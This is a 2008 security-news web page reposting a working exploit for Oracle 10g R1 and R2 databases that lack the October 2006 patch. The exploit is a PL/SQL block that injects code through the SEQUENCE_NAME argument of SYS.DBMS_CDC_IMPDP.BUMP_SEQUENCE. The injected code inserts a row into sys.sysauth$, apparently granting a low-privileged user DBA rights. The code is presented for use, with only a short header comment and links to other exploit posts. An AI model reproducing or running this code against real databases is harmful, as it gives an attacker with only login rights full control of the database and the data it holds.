11.21.2008
Navigation:
Main Page
Technology
Downloads
Security
Entertainment
Videos
Search Site:
Advanced
Login
Register
News Item
Oracle 10g SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL/SQL Injection
Jan 24 2007 10:42:46
Source:
ace
0
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
*
* Max.
Length 97. Very, very cool
*
*/
select *
from user_role_privs
;
DECLARE
SEQUENCE_OWNER VARCHAR2(200);
SEQUENCE_NAME VARCHAR2(200);
v_user_id number;
v_commands VARCHAR2(32767);
NEW_VALUE NUMBER;
BEGIN
SELECT user_id INTO v_user_id
FROM user_users;
v_commands := 'insert into sys.sysauth$ ' ||
' values' ||
'(' || v_user_id || ',4,' ||
'999,null)';
SEQUENCE_OWNER := 'TEST';
SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit;
end;--';
NEW_VALUE := 1;
SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(
SEQUENCE_OWNER => SEQUENCE_OWNER,
SEQUENCE_NAME => SEQUENCE_NAME,
NEW_VALUE => NEW_VALUE
);
END;
/
select *
from user_role_privs
;
.
» full story @ source-link:
ace
Related Articles:
»
Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
»
S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
»
PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
»
SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
Comments
Add Comment
You must be registered and logged in to add comments!
Register
Login
Sponsors
Sponsors
Addict
3
d.org (c) 2002 - 2008 -
About US
-
Contact US
site was created by smiles of fortune
